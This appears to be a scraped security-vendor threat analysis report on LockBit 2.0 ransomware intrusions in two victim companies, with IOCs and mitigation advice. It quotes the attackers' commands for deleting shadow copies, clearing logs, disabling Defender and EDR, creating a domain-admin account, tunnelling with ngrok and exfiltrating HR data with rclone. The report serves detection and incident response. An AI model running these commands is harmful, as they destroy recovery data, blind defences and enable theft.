{ "id": "db2fe1fe-900c-433a-b2c5-f326934c3fa5", "created_at": "2026-04-06T00:10:31.573997Z", "updated_at": "2026-04-10T13:11:18.916379Z", "deleted_at": null, "sha1_hash": "96e3a887c522c6d8d74b053bf93faca97a312a7c", "title": "THREAT ANALYSIS REPORT: LockBit 2.0 - All Paths Lead to Ransom", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 7703168, "plain_text": "THREAT ANALYSIS REPORT: LockBit 2.0 - All Paths Lead to\r\nRansom\r\nBy Cybereason Global SOC Team\r\nArchived: 2026-04-02 12:09:11 UTC\r\nThe Cybereason Global Security Operations Center (GSOC) Team issues Cybereason Threat Analysis Reports to\r\ninform on impacting threats. The Threat Analysis Reports investigate these threats and provide practical\r\nrecommendations for protecting against them.\r\nIn this Threat Analysis report, Cybereason GSOC team analysts have analyzed two different cases that involved\r\nLockBit infections, occurring at two very different time periods. Following this introduction, we describe in detail\r\nthe attack chain from the initial infection to the ransomware deployment.\r\nKey Points\r\nIntensive data exfiltration: Cybereason observed LockBit stealing large amounts of information from its\r\nvictims. The threat actors mostly used FTP and cloud file hosting solutions such as FileZilla, Rclone and\r\nMegaSync to exfiltrate the information. \r\nConstantly evolving tools and techniques: LockBit operates on a RaaS (Ransomware as a Service)\r\nmodel. The affiliates that use LockBit’s services conduct their attacks according to their preference and use\r\ndifferent tools and techniques to achieve their goal. As the attack progresses further along the kill chain, the\r\nactivities from different cases tend to converge to similar activities.\r\nEDR-aware mentality: The attackers are constantly evolving, and take into consideration that EDR tools\r\nare doing the same. Thus, the attackers are making detection, investigation, and prevention more complex\r\nby disabling EDR and other security products, while deleting the evidence to baffle forensics attempts.\r\nCybereason Managed Detection and Response (MDR): The Cybereason GSOC team has a zero-tolerance policy towards attacks involving LockBit and its affiliates, and categorizes such attacks as\r\ncritical, high-severity incidents. The Cybereason GSOC MDR Team issues a comprehensive report to\r\ncustomers when such an incident occurs. The report provides an in-depth overview of the incident, which\r\nhelps to understand the scope of the compromise and the impact on the customer’s environment. These\r\nreports also provide attribution information whenever possible, as well as recommendations for threat\r\nmitigation and isolation. \r\nDetected and prevented: The Cybereason Defense Platform effectively detects and prevents infections\r\nfrom LockBit and their affiliates.\r\nIntroduction\r\nIn September 2019, a new version of a worm-like ransomware was reported. This ransomware was known as\r\nLockBit. Since then, a new variant of LockBit was discovered, dubbed–LockBit 2.0.\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 1 of 36\n\nLockBit 2.0 is very efficient and can spread quickly within a target network. It also operates in a RaaS\r\n(Ransomware-as-a-service) model, which has become an increasingly popular business model for ransomware\r\noperators in the past few years, helping ransomware groups expand their reach and revenue while scaling up,\r\nwithout considerably growing their core team or expenses.\r\nRaaS is a subscription-based model that enables affiliates to use existing ransomware tools and infrastructure in\r\norder to execute ransomware attacks. LockBit 2.0 incentivizes affiliates to earn a percentage of each successful\r\nransom payment by leveraging their tools to compromise entire networks and systems.\r\nSimilar to other ransomware, LockBit 2.0 uploads the compromised files to a public repository, where they are\r\navailable to everyone on the internet:\r\nLockBit 2.0 portal screenshot\r\nWe have observed many different ransomware attacks which have increased massively over the past months.\r\nLockBit is one of the dominating ones, and in fact, is a highly sophisticated form of ransomware (see also: White\r\nPaper - Inside Complex RansomOps and the Ransomware Economy). Current potential LockBit 2.0 victims’\r\nbusiness sectors range from IT services, to financial institutions, to other large organizations.\r\nAfter the attackers have cleared their footstep by tampering with Windows security features to eliminate the\r\npossibility of recovering the encrypted data by deleting backups and restoring features, the attackers proceed to\r\nencrypt the files on the affected machines.\r\nAfter the encryption, the user receives a ransom note informing them about the encryption of the files and\r\nprovides instructions on how to decrypt them by paying the ransom:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 2 of 36\n\nPost encryption ransom note as observed in one case study\r\nThe high demand for LockBit’s services and its effective affiliate program makes it a growing threat that should\r\nnot be overlooked. \r\nCybereason successfully detects LockBit’s operation and is able to facilitate the scoping of the threat, its\r\nmagnitude and spread, and thus helps impacted organizations to act on time and stop the attack from infecting\r\nmore systems and crucial assets.\r\nAnalysis\r\nAttack Life Cycle: Case Study 1\r\n Attack diagram as observed in this case study \r\nThis case study describes how LockBit affiliates penetrated a network in Q4 2021 and worked their way through it\r\nto encrypt the assets of the victim, a company in the industrial sector.\r\nInfection Vector\r\nThe affiliates working with LockBit are using their own malware and tools to launch the actual attacks on their\r\ntargets. In most of the infections that we have encountered, the infection vector that led to the delivery of LockBit\r\nwas a misconfigured service, particularly a publicly opened RDP port. \r\nIn other cases, affiliates would use a more traditional phishing email that will allow them to remotely connect to a\r\nnetwork via an employee’s computer, or utilize malicious attachments, downloads, application patch exploits or\r\nvulnerabilities to gain access to a network.\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 3 of 36\n\nCredentials Access and Reconnaissance\r\nOnce the attacker established an initial foothold on the compromised network (machine), their next step was to\r\nstart the reconnaissance activity and credentials extraction. \r\nIn this case, the attackers used tools such as Mimikatz and Netscan, a powerful network monitoring system that is\r\nused to identify the network’s structure and valuable assets on the network. Both of these tools were used to assist\r\nlateral movement throughout the network:\r\nThe use of Mimikatz and Netscan as seen in the Cybereason Defense Platform\r\nAs can be seen in the image below, the attacker also used taskmgr.exe (Windows Task Manager) to create a\r\nmemory dump of lsass.exe (Microsoft Local Security Authority Subsystem Service) to extract the user’s\r\ncredentials:\r\nDumping lsass.exe process memory as seen in the Cybereason Defense Platform\r\nVulnerabilities Exploitation\r\nTo achieve more stealth and gain elevated privileges, the attackers also attempted to exploit the SpoolFool\r\nvulnerability (CVE-2022-21999), which was first reported in February 2022. This vulnerability allows an\r\nunprivileged user to create arbitrary and writable directories by configuring the SpoolDirectory attribute on a\r\nprinter. \r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 4 of 36\n\nSince an unprivileged user is allowed to add remote printers, an attacker can create a remote printer and grant\r\neveryone the right to manage this printer. Eventually, this is further used to perform tasks such as injecting\r\nmalicious modules:\r\nExploitation of the SpoolFool vulnerability as seen in the Cybereason Defense Platform\r\nLateral Movement and Remote Code Execution\r\nThe attacker used PsExec to execute commands and other malicious executables and files on different machines\r\non the network. \r\nPsExec is a portable tool from Microsoft that lets you run processes remotely using any user's credentials. It’s\r\nsimilar to a remote access program but instead of controlling the computer with a mouse, commands are sent via\r\nthe Command Prompt.\r\nPsExec may be used by the attacker not only to manage processes on the remote computer, but also to redirect an\r\napplication’s console output to his computer, making it appear as though the process is running locally. \r\nDefense Evasion\r\nImpairing Defenses\r\nAs can be seen in the image below, the attacker used PsExec to remotely execute files and tools on the affected\r\nmachines, such as :\r\nC:\\WINDOWS\\system32\\cmd.exe /c \"1.cmd\" \r\nC:\\WINDOWS\\system32\\cmd.exe /c \"rdp.bat\"\r\nThese commands were used to enable RDP connections and tamper with the Windows Defender settings. These\r\nactions were taken in order to allow the attacker to remotely connect to the machines via compromised credentials\r\nand view, transfer or manipulate every file on the user’s system.\r\nTo enable RDP connections, the attackers used the aforementioned scripts which changed the registry value of the\r\nfollowing to zero which specifies that Remote Desktop connections are enabled: \r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 5 of 36\n\nHKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections \r\nThe attackers have also used a Netsh command for adding a rule to the Windows Firewall exceptions list, allowing\r\nthe use of RDP on local port (3389):\r\nnetsh advfirewall firewall add rule name=”allow RemoteDesktop” dir=in protocol=TCP localport=3389\r\naction=allow\r\nIn addition, as part of the executed scripts activity, PowerShell was observed executing the command “-Command\r\nAdd-MpPreference -ExclusionPath *C:\\\\” which altered the Windows Defender settings by adding every file\r\nlocated under the (C:) directory to the Windows Defender exclusion list, meaning every file that is located under\r\nthis directory will not be monitored by Windows Defender. \r\nThat gave the attackers a “free hand” to operate and execute every file they desired with no interference or\r\nprevention:\r\n1.cmd enabling RDP connections and tampering with Windows security as seen in the Cybereason Defense\r\nPlatform\r\nFor the attack to execute effectively, attackers conduct preliminary actions. Once executed, LockBit deletes\r\nimportant records, backups, and data from the infected host in order to prevent forensics and recovery attempts of\r\nthe encrypted data:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 6 of 36\n\nrdp.bat enabling RDP connections and tampering with Windows security as seen in the Cybereason Defense\r\nPlatform\r\nSubverting Recovery Methods\r\nThe attacker used wevtutil, a Windows legacy tool which enables retrieving information about event logs. The\r\ncommands in the image below were used by the attackers to clear logs that contain records of login/logout\r\nactivities or other security-related events specified by the system’s audit policy and applications.\r\nThe attackers executed this program in order to hide their tracks to avoid future forensics on the host:\r\nUsing wevtutil to clear security logs as seen in the Cybereason Defense Platform\r\nAnother method we have spotted of deleting footprints by the attacker was using the ping command as a delay\r\nmechanism, allowing the ransomware process to terminate. Then the File System utility (Fsutil.exe) is used to\r\nprevent the malicious executable from being recovered by overwriting the first 524KB with zeros:\r\nfsutil file setZeroData offset=0 length=524288 [Lockbit binary file path]\r\nUsing fsutil.exe and ping to delete footprints as seen in the Cybereason Defense Platform\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 7 of 36\n\nBesides the use of wevtutil, the attackers also destroyed recovery methods with the help of the tools bcdedit.exe,\r\nwmic.exe, and vssadmin.exe.\r\nBCDEdit is a command-line tool for managing the Boot Configuration Data. In this case, BCDEdit was used to\r\nensure that system boot failures are ignored and the recovery boot option disabled. This is also a method to make\r\nit harder for the user to retrieve their data:\r\nUsing wevtutil.exe and bcdedit.exe to prevent recovery as seen in the Cybereason Defense Platform\r\nThe Volume Shadow Copy Service is an administrative tool that provides the framework for doing volume\r\nbackups and for creating consistent, point-in-time copies of data (known as shadow copies). \r\nThe attacker used both vssadmin.exe and Windows Management Instrumentation utility (wmic.exe) to delete the\r\nsystem’s shadow copies, and in doing so, making it impossible for the user to restore to the latest restore point or\r\nuse any of the backups:\r\n Using vssadmin.exe and wmic.exe to delete shadow copies as seen in the Cybereason Defense Platform\r\nDeactivation of AV/EDR \r\nAs part of the attack, the attackers used legitimate tools such as a small portable freeware called “Defender\r\nControl” which is used to disable Windows Defender in Windows 10 on some of the affected systems.\r\nThis is an easy yet effective method to disable Windows native security features:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 8 of 36\n\nUsing “Defender Control” to disable Windows Defender as seen in the Cybereason Defense Platform\r\nAttack Life Cycle: Case Study 2\r\nAttack diagram as observed in this case study \r\nThis case study describes how LockBit affiliates penetrated a network in Q2 2022 and worked their way through\r\nto encrypt the assets of the victim, a company in the retail industry.\r\nLateral Movement\r\nThe first activity captured in this case study involves the PsExec utility by SysInternals. The threat actor laterally\r\nmoved from “patient zero” to another server through the PsExec tool:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 9 of 36\n\nPsexesvc.exe spawning children process controlled by the attacker as seen in the Cybereason Defense Platform\r\nThis allowed the threat actors to progress their intrusion by infecting more machines. Through the attack chain,\r\nthe threat actors continuously leveraged PsExec.exe and mstsc.exe to pivot from one server to others using the\r\nfollowing command:\r\nPsexec \\\\[IP of the server] -s cmd.exe\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 10 of 36\n\nMstsc.exe and\r\nPsExec.exe launched directly from a machine with visibility as seen in the Cybereason Defense Platform\r\nPersistence \r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 11 of 36\n\nAccount Creation\r\nThe threat actors used net.exe to create a domain account and elevate its privileges to “domain administrator”\r\nthrough the following commands :\r\nC:\\Windows\\system32\\net1 user /domain [Created attacker username] /add                                \r\nC:\\Windows\\system32\\net1 user                                          \r\nC:\\Windows\\system32\\net1 user /domain [Created attacker username] Numlock!123 /add\r\nC:\\Windows\\system32\\net1 group \"domain admins\" [Created attacker username] /add\r\nThis implied that the attacker already had high privileges on the Active Directory domain of the victim:\r\nNet.exe and net1.exe being leveraged to create a domain user and assign it to the “administrators” domain group\r\nThe threat actor then used this account to persist and spread on the victim’s network.\r\nPersistent Network Tunnel\r\nThe threat actor launched the following commands on 11 machines (10 servers, 1 workstation):\r\nlssas.exe tcp 3389 --log=stdout\r\nlssas.exe config add-authtoken 28hJ[...]KW27Jpi\r\nThe binary named “lssas.exe” is masquerading as “lsass.exe” (Windows process in charge of handling\r\nauthentication on the system) but is in fact the infamous tunneling tool, “Ngrok”:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 12 of 36\n\nLssas.exe (in fact, Ngrok) deployed on one of the affected machine through PsExec as seen in the Cybereason\r\nDefense Platform\r\nNgrok is a legitimate reverse proxy tool that is able to create a tunnel to servers located behind firewalls. It is also\r\nable to tunnel traffic to local machines that do not have a public IP. Ngrok has been utilized by threat actors in\r\nmany campaigns and is known to be famous specifically for lateral movement and data exfiltration\r\nfunctionalities. \r\nExecuting Ngrok gave the attackers the ability to access the network remotely, even if the initial infection vector is\r\nlater patched or removed. The Cybereason GSOC team then observed RDP sessions initiated through this tunnel:\r\n Remote interactive sessions executed through the Ngrok tool tunneling RDP traffic as seen in the Cybereason\r\nDefense Platform\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 13 of 36\n\nCredential Theft\r\nThe threat actor then proceeded to steal further credentials on the network, in order to extend their access on the\r\nnetwork. In this case study, the threat actors interactively used the Windows executable taskmgr.exe to dump the\r\nmemory of the process lsass.exe:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 14 of 36\n\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 15 of 36\n\nLsass.exe process dumping through the taskmgr.exe executable as seen in the Cybereason Defense Platform\r\nThe attackers then copied the memory dump file back onto the machine they controlled, using remote desktop\r\n(RDP) access and the tunnel created earlier. They then used tools such as “Mimikatz” to extract credentials from\r\nthe dump file.\r\nA day later, as the attack progressed, the threat actors continued their credential collection activity by launching\r\nthe Windows executable ntdsutil.exe on one of the domain controllers:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 16 of 36\n\nNtdsutil.exe command-line tool executed on one of the domain controllers as seen in the Cybereason Defense\r\nPlatform\r\nThis granted the attackers access to all Active Directory accounts name and password hashes, enabling them to\r\neventually attempt to recover the plaintext password.\r\nData Exfiltration\r\nOnce the LockBit affiliate achieved persistent remote access and sufficient credentials, they proceeded to collect\r\nand exfiltrate the data.\r\nThe actors used three different tools for that purpose :\r\nFilezilla.exe to connect to a remote FTP service controlled by the attacker\r\nRclone.exe to exfiltrate data to a “Mega”-related cloud hosting service\r\nMegasync.exe tool to exfiltrate data to a “Mega”-related cloud hosting service\r\nFirst, the threat actor installed and launched the filezilla.exe client using the following command lines :\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 17 of 36\n\nC:\\Users\\[Username]\\Downloads\\FileZilla_3.59.0_win64_sponsored-setup.exe\r\nFilezilla.exe\r\nHighlight on the connections to one IP address in particular, 185.81.68.180, on random ports 50749, 54001,\r\n59516 and 59705 as seen in the Cybereason Defense Platform\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 18 of 36\n\nThe Cybereason GSOC team observed the exfiltration activity related to “Filezilla” on six servers. After this\r\nexfiltration method was used, the threat actor leveraged Rclone.exe to again, exfiltrate data using the following\r\ncommands:\r\nrclone config\r\nrclone copy \"[HR data folder path]\" [remote path]:[remote path]\r\nThis activity is captured below. One can observe that the executable is launched through PsExec and represents\r\nunusually high network traffic:\r\nRclone.exe leveraged to exfiltrate data to mega.co.nz as seen in the Cybereason Defense Platform\r\nFinally, the threat actor used a third tool to exfiltrate data to Mega[.]co[.]nz cloud hosting servers. The tool used\r\nfor this is called Megasync.exe. The attackers ran the following commands to exfiltrate the data: \r\nC:\\Users\\[Username]\\Downloads\\MEGAsyncSetup64.exe\r\nC:\\Users\\[Username]\\AppData\\Local\\MEGAsync\\MEGAsync.exe\r\nC:\\Users\\[Username]\\AppData\\Local\\MEGAsync\\MEGAsync.exe /uninstall\r\nThe Cybereason GSOC team only observed the exfiltration activity related to Mega on the company main file\r\nserver.\r\nNetwork Discovery \r\nAt this point, the threat actor presented on the network for a while and had access to multiple servers and\r\nworkstations. In order to progress to its next and final phase, data encryption, the attacker needed a list of all the\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 19 of 36\n\nassets of the victim. The actor leveraged the “Advanced IP Scanner” tool in order to identify as many machines as\r\npossible. \r\nThis tool is meant to actively discover hosts and their hosted services. The attacker launched it from two different\r\nservers that are considered as “pivoting” machines for the actor:\r\nAdvanced IP scanner creating network connections and spawning remote desktop process (mstsc.exe) as seen in\r\nthe Cybereason Defense Platform\r\nThe actor also used the provided remote desktop client feature to spawn child mstsc.exe processes that are meant\r\nto connect through the remote desktop service or RDP. We have observed a very high number of connections to\r\ninternal IP addresses.\r\nApproximately at the same time, the actor also infected 15 additional machines with the malware “Neshta”.\r\nNeshta is a file infector which injects its malicious code to targeted executable files:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 20 of 36\n\nNeshta was injected into many executables, also spawning the “svchost.com” process as a result, which spawns\r\nthe legitimate executable again as a child process as seen in the Cybereason Defense Platform\r\nAs previously mentioned in the community, some LockBit and other ransomware and attacks (REvil/Sodinokibi,\r\nfor instance) are found to be concurrent with present Neshta infections on the same environment. \r\nWe did not find evidence that demonstrates the specific use of Neshta by the attackers, and hence we strongly\r\nbelieve that the tools the attackers used were pre-infected with Neshta:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 21 of 36\n\nSource : https://twitter.com/AltShiftPrtScn/status/1519265746630717440\r\nAt this point, the LockBit affiliate had completed all the necessary steps to execute the LockBit payload and\r\ncommence encryption:\r\nPersistence on the network through multiple infected machines\r\nAccess to top-privilege accounts\r\nCollected and exfiltrated victim data \r\nList of most assets through network discovery and scans\r\nDefense Evasion and Impact Phases\r\nThis section describes the “Defense Evasion” and “Impact” phases (according to the MITRE ATT\u0026CK Tactic\r\nclassification).\r\nApproximately four hours before the global deployment of the LockBit ransomware, the attacker bypassed\r\nexisting security features and also deleted evidence in order to complicate investigation and forensics attempts.\r\nSecurity Products Deactivation Attempts\r\nFirst, the threat actor attempted to disable the Cybereason sensors, directly from the impacted machine. For that\r\npurpose, they used the two following commands : \r\nCrDrvCtrl disable test, which attempts to disable the driver installed by the EDR\r\nWmic product where name=”Cybereason Sensor” call uninstall /noninteractive, which attempts to\r\nuninstall the sensor on the machine\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 22 of 36\n\nThreat actor attempting to disable Cybereason’s sensor as seen in the Cybereason Defense Platform. This attempt\r\nfailed.\r\nThreat actor attempting to uninstall Cybereason’s sensor as seen in the Cybereason Defense Platform. This\r\nattempt failed.\r\nBoth attempts failed in the context of the victim. The threat actor then attempted to disable EPP/AV products on\r\nthe different machines. Bitdefender was first targeted through the attempt to disable BitDefender mini-filter with\r\nthe command: \r\n“fltmc” unload gzflt\r\nThreat actor disabling BitDefender mini-filter as seen in the Cybereason Defense Platform\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 23 of 36\n\nA few minutes before it launched the ransomware, the attacker also launched “defendercontrol.exe” on 14 servers.\r\nAs stated in the previous case study, Defender Control is used to disable Microsoft Defender:\r\nLaunching of “defendercontrol.exe” as seen in the Cybereason Defense Platform\r\nIn addition to the use of “defendercontrol.exe”, the attacker launched the following commands, that were started\r\nfrom a service created by the attacker, named “TrustedInstaller”:\r\n“PowerShell -nop -win 1 -c \u0026 {$AveYo=' A LIMITED ACCOUNT PROTECTS YOU FROM UAC\r\nEXPLOITS ';$env:1=6;$k=@();$k+=gp Registry::HKEY_Users\\S-1-5-21*\\Volatile* ToggleDefender -ea\r\n0;iex($k[0].ToggleDefender)}”\r\nMpCmdRun.exe -DisableService\r\nNet1.exe stop windefend - D\r\nsc.exe config windefend depend=RpcSs-TOGGLE\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 24 of 36\n\nThreat Actor launching a PowerShell one-liner command to disable EPP/Antivirus products as seen in the\r\nCybereason Defense Platform\r\nIn order to execute all the activities related to “Defense Evasion”, the actor used a batch script to automate the\r\nexecution: \r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 25 of 36\n\nBatch scripts launched\r\nremotely on the targeted machines\r\nRansomware Deployment \r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 26 of 36\n\nThe threat actor launched the Lockbit ransomware executable. The threat actor used three different methods for\r\nthis purpose : \r\nManual deployment through RDP \r\nSemi-automated deployment with “PsExec” through the ransomware binary itself\r\nCreation of a dedicated GPO (Group Policy Object) on the main Active Directory forest\r\nThe GPO created scheduled tasks that :\r\nAttempted to kill security-related and backup-related products’ processes \r\nStopped many application-related services (for instance, SQL engine services)\r\nLaunched the Lockbit ransomware executable \r\nExtract from the GPO created by the attacker\r\nThe ransomware executed on the victim machines was “Lockbit 2.0”. It was configured to automatically spread on\r\nall configured targets and thus created internal network connections:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 27 of 36\n\nLockbit ransomware deployment and activity as seen in the Cybereason Defense Platform\r\nIt also spawned multiple child processes including: \r\n\"C:\\Windows\\SysWOW64\\mshta.exe\"\r\n\"C:\\Users\\TEMP\\Desktop\\LockBit_Ransomware.hta\" [GUID]\r\nPreparing the Machines for Encryption \r\nThe Lockbit ransomware launched cmd.exe which created different child processes in order to prepare the\r\nmachine for encryption. The following commands were issued by the executable: \r\nvssadmin delete shadows /all /quiet\r\nbcdedit /set {default} recoveryenabled No\r\nwmic SHADOWCOPY /nointeractive\r\nping 127.0.0.7 -n 3\r\nfsutil file setZeroData offset=0 length=524288 \"C:\\Windows\\LockBit_[Random number].exe\"\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 28 of 36\n\nLockBit ransomware\r\nexecution preparing the machine for encryption with backup deletion and machine performance modification as\r\nseen in the Cybereason Defense Platform\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 29 of 36\n\nThis activity is exactly the same as the one documented in the first case study. You can refer to the first case study\r\nfor more information.\r\nLog Deletion\r\nThe system events deletion phase happened approximately at the same time as the launch of the ransomware. \r\nSimilar to the activity documented in the first case study, this shows an enhancement compared to the first case\r\nstudy log deletion attempts, as many event sources are targeted, instead of just deleting “security”, “system” and\r\n“application” Windows events: \r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 30 of 36\n\nListing of wevtutil.exe commands\r\nlaunched by the attacker\r\nThe command “Wevtutil CL [Event source]” is used to clear local Windows event logs.\r\nA Glance Into the IOCs\r\nThe infrastructure in use by the attacker that was identified in the second case study is heterogenous, depending on\r\nthe tool used:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 31 of 36\n\nFor persistence and exfiltration activities, the attacker leveraged cloud servers. For instance, subdomains\r\nfrom “userstorage.mega.co.nz” or “ngrok.io” (rclone.exe tool, megasync.exe tool, ngrok tool)\r\nFor another exfiltration tool, Filezilla, which is an FTP client, the context is different: an IP address stood\r\nout, 185.81.68[.]180, located in Russia\r\nThe Cybereason GSOC team analyzed the infrastructure related to this IP address and identified the following key\r\npoints:\r\nThe IP address is not detected in VirusTotal\r\nThe service provider is located in Russia\r\nThe ISP company, based in Cyprus, is named Starcrecium, associated in the past with other malicious\r\nactors\r\nMany network services observed on the IP address, including remote desktop, HTTP, FTP, WinRM\r\nTLS certificate associated with the RDP service is signed for “WIN-LIVFRVQFMKO”, which is a\r\ncommon name for a machine, also associated with other malicious activities \r\nIP address 185.81.68[.]180 - Service analysis\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 32 of 36\n\nIP address 185.81.68[.]180 - Hosting Company analysis\r\nLink Repository\r\nVirusTotal - Link #1 - https://www.virustotal.com/gui/ip-address/193.27.228.247/detection\r\nActive VPN Reconnaissance - Link #2 - https://www.securityondemand.com/active-vpn-reconnaissance-campaign-from-russia-based-ip/\r\nLOREC53 activity - Link #3 - https://nsfocusglobal.com/apt-retrospection-lorec53-an-active-russian-hack-group-launched-phishing-attacks-against-georgian-government/\r\nAbuseIPDB - Link #4 - https://www.abuseipdb.com/check/45.135.232.93?page=4\r\nAlienVault pulse - Link #5 - https://otx.alienvault.com/pulse/61348def9b7e45731d8bef82\r\nDetection and Prevention\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 33 of 36\n\nCybereason Defense Platform\r\nThe Cybereason Defense Platform is able to detect and prevent infections with LockBit using multi-layer\r\nprotection that detects and blocks malware with threat intelligence, machine learning, and Next-Gen Antivirus\r\n(NGAV) capabilities:\r\nThe Cybereason Defense Platform creates a MalOp out of the execution of the LockBit binary \r\nThe Cybereason Defense Platform identifies the malicious code injection and executable\r\nCybereason GSOC MDR\r\nThe Cybereason GSOC recommends the following:\r\nEnable the Anti-Malware feature on the Cybereason NGAV and enable the Detect and Prevent modes of\r\nthis feature. \r\nEnable the Anti-Ransomware feature on the Cybereason NGAV and enable the Detect and Prevent modes\r\nof this feature.\r\nSecurely handle files downloaded from the Internet and email messages that originate from external\r\nsources.\r\nThreat Hunting with Cybereason: The Cybereason MDR team provides its customers with custom hunting\r\nqueries for detecting specific threats - to find out more about threat hunting and Managed Detection and\r\nResponse with the Cybereason Defense Platform, contact a Cybereason Defender here.\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 34 of 36\n\nFor Cybereason customers: More details available on the NEST including custom threat hunting\r\nqueries for detecting this threat.\r\nCybereason is dedicated to teaming with defenders to end cyber attacks from endpoints to the enterprise to\r\neverywhere. Schedule a demo today to learn how your organization can benefit from an operation-centric\r\napproach to security.\r\nIndicators of Compromise\r\nExecutables\r\nSHA-256 hash: Neshta - svchost.com\r\nb462d28ae1f49b389d1df0213eafc75daf2ce681db989a363348d7f19379c02b\r\nSHA-1 hash: \r\ndb6e1a1dbb0e351c44b49db79b8bad3321d673a1\r\nSHA-256 hash: DefenderControl.exe \r\nce162d2d3649a13a48510e79ef0046f9a194f9609c5ee0ee340766abe1d1b565\r\nIP addresses 185.81.68.180\r\nMITRE MAPPING\r\nThe table below summarizes the activities that are most prevalent across all infections with LockBit that the\r\nCybereason MDR team has observed:\r\nAbout the Researchers\r\nLoïc Castel, Principal Security Analyst, Cybereason Global SOC\r\nLoïc Castel is a Senior Security Analyst with the Cybereason Global SOC team. Loïc analyses and researches critical incidents\r\nand cybercriminals, in order to better detect compromises. In his career, Loïc worked as a security auditor in well-known\r\norganizations such as ANSSI (French National Agency for the Security of Information Systems) and as Lead Digital Forensics \u0026\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 35 of 36\n\nIncident Response at Atos. Loïc loves digital forensics and incident response, but is also interested in offensive aspects such as\r\nvulnerability research.\r\nGal Romano, Senior Security Analyst, Cybereason Global SOC\r\nGal Romano is a Senior Security Analyst with the Cybereason Global SOC (GSOC) team. He is involved in malware analysis,\r\nmobile malware analysis, and threat hunting activities. Gal was involved in several milestone projects in Cybereason, such as the\r\nSOC Extended Detection and Response (XDR) initiative, and the Linux hunting team.\r\nSource: https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 36 of 36", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "ETDA", "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom" ], "report_names": [ "threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "eecf54a2-2deb-41e5-9857-fed94a53f858", "created_at": "2023-01-06T13:46:39.349959Z", 